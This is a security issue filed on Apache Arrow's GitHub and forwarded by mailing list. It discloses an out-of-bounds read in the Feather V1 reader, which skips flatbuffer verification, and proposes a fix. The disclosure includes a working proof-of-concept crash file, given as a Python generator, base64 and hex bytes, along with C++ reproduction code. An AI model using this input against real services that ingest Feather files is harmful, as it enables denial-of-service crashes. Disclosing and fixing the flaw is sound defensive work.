OwenSanzas opened a new issue, #50229:
URL: https://github.com/apache/arrow/issues/50229

   
   ## Summary
   
   Opening a crafted Feather **V1** file through the public
   `arrow::ipc::feather::Reader::Open` API triggers an AddressSanitizer
   heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
   metadata parsing. The reader calls `fbs::GetCTable` on the trailing metadata
   flatbuffer **without first running a `flatbuffers::Verifier`**, then
   dereferences attacker-controlled offsets in `ReaderV1::ReadSchema`
   (`cpp/src/arrow/ipc/feather.cc:178`) before any `Status` error can be 
returned.
   A 36-byte file with the `FEA1` magic and a corrupt footer triggers the crash
   deterministically, so any service that ingests untrusted Feather V1 files 
can be
   crashed (denial of service).
   
   Tested at pinned commit `16fe34250a2ef261790b9cc414fdf0831669cf9f`
   (25.0.0-SNAPSHOT).
   
   ## Root Cause
   
   `ReaderV1::Open` reads the trailing metadata flatbuffer and obtains a typed 
view
   of it via `fbs::GetCTable(...)`. A flatbuffer obtained this way is 
**untrusted**:
   its vtable, field offsets, and vector lengths are attacker-controlled bytes. 
The
   flatbuffers contract requires a caller to run a `flatbuffers::Verifier` over 
the
   buffer before touching any generated accessor; only verification guarantees 
that
   every offset stays inside the buffer.
   
   `ReaderV1::Open` skips that step. It goes straight from `GetCTable` to
   `ReadSchema()`, which dereferences `metadata_->columns()` on the unverified
   table. `columns()` is a flatbuffers `GetPointer` that reads the vtable and an
   offset field; with a corrupt offset, `flatbuffers::ReadScalar` reads past 
the end
   of the metadata buffer.
   
   Vulnerable code (`cpp/src/arrow/ipc/feather.cc:172`):
   
   ```cpp
       metadata_ = fbs::GetCTable(metadata_buffer_->data());   // no 
flatbuffers::Verifier
       return ReadSchema();
     }
   
     Status ReadSchema() {
       std::vector<std::shared_ptr<Field>> fields;
       for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) 
{  // line 178: deref unverified flatbuffer
         const fbs::Column* col = metadata_->columns()->Get(i);
         std::shared_ptr<DataType> type;
         RETURN_NOT_OK(
             GetDataType(col->values(), col->metadata_type(), col->metadata(), 
&type));
         fields.push_back(::arrow::field(col->name()->str(), type));
       }
   ```
   
   Call chain (attacker bytes -> fault):
   
   ```
   arrow::ipc::feather::Reader::Open          feather.cc:773 / :794  (public 
API)
     -> ReaderV1::Open                        feather.cc:173
          metadata_ = fbs::GetCTable(...)      feather.cc:172   <- NO 
flatbuffers::Verifier
        -> ReaderV1::ReadSchema               feather.cc:178
             metadata_->columns()->size()  -> fbs::CTable::columns()  
feather_generated.h:698
               -> flatbuffers::Table::GetVTable
                 -> flatbuffers::ReadScalar   base.h:440   <- OOB read
   ```
   
   The metadata buffer is sized to the file's declared `metadata_length`; the
   corrupt offset points past that region, so the accessor reads out of bounds.
   Arrow's own threat model (`docs/source/cpp/security.rst`, "Ingesting 
untrusted
   data") states the IPC reader APIs must return an `arrow::Status` error on
   malformed input. The V1 reader violates that contract: it crashes before it 
can
   return a `Status`.
   
   ## PoC
   
   A 36-byte malformed Feather V1 file: the `FEA1` magic header, padding, a
   `metadata_length` of 0, and the trailing `FEA1` magic. `Reader::Open` selects
   the legacy V1 path on the `FEA1` magic, then `GetCTable` builds a table over 
an
   empty/short metadata region and `columns()` reads out of bounds.
   
   ```python
   # generate_poc.py — re-create the shipped 36-byte crash input
   poc = (b"FEA1"          # leading magic
          + b"\xff" * 24    # corrupt footer body
          + b"\x00\x00\x00\x00"  # metadata_length = 0
          + b"FEA1")        # trailing magic
   open("poc.bin", "wb").write(poc)
   assert len(poc) == 36
   ```
   
   Crash input size: 36 bytes (`poc/poc.bin`, md5 
`9d96bcc065b6672396fed18492792d03`).
   
   ## Reproduction
   
   Build Arrow C++ from source with `-DARROW_IPC=ON` and AddressSanitizer, then 
open the attached Feather
   V1 file through the public reader API:
   
   ```cpp
   #include <arrow/ipc/feather.h>
   #include <arrow/io/memory.h>
   // auto buf = ...read poc.bin...;
   auto source = std::make_shared<arrow::io::BufferReader>(buf);
   std::shared_ptr<arrow::ipc::feather::Reader> reader;
   auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader);   // OOB 
read here
   ```
   
   `ReaderV1::Open` does `metadata_ = fbs::GetCTable(metadata_buffer_->data())` 
with **no
   `flatbuffers::Verifier`** over the metadata, then `ReadSchema()` 
dereferences `metadata_->columns()` on
   the unverified flatbuffer:
   
   ```
   AddressSanitizer: heap-buffer-overflow READ
     #0 flatbuffers::ReadScalar<...>            base.h
     #1 arrow::ipc::feather::fbs::CTable::columns()  feather_generated.h
     #2 ReaderV1::ReadSchema / ReaderV1::Open   ipc/feather.cc
   ```
   
   The unverified `GetCTable` + `columns()` deref is still present in current 
`master` (`cpp/src/arrow/ipc/feather.cc:172`).
   PoC: 36-byte `.feather` file (recreate from the base64 below).
   
   ## Suggested Fix
   
   Run a `flatbuffers::Verifier` over the metadata buffer before calling
   `fbs::GetCTable` / dereferencing any accessor, returning `Status::Invalid` on
   failure — matching how the V2/IPC reader rejects malformed metadata:
   
   ```diff
      ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                            source->ReadAt(size - footer_size - metadata_length,
                                           metadata_length, 
/*allow_short_read=*/false));
   
   -  metadata_ = fbs::GetCTable(metadata_buffer_->data());
   +  flatbuffers::Verifier verifier(metadata_buffer_->data(),
   +                                 metadata_buffer_->size());
   +  if (!fbs::VerifyCTableBuffer(verifier)) {
   +    return Status::Invalid("Feather V1 metadata failed flatbuffer 
verification");
   +  }
   +  metadata_ = fbs::GetCTable(metadata_buffer_->data());
      return ReadSchema();
   ```
   
   (The exact verifier symbol depends on the generated `feather_generated.h`; 
the
   principle is "verify before accessing", and the precise call is the upstream
   maintainer's judgement.)
   
   ## PoC bytes (self-contained)
   
   The trigger input is **36 bytes** (`poc/poc.bin`).
   Recreate it exactly with:
   
   ```bash
   base64 -d > poc.bin <<'B64'
   RkVBMf///////////////////////////////wAAAABGRUEx
   B64
   ```
   
   Hex: 
`46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131`
   
   ## Credit
   
   Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, 
Guido Vranken).
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to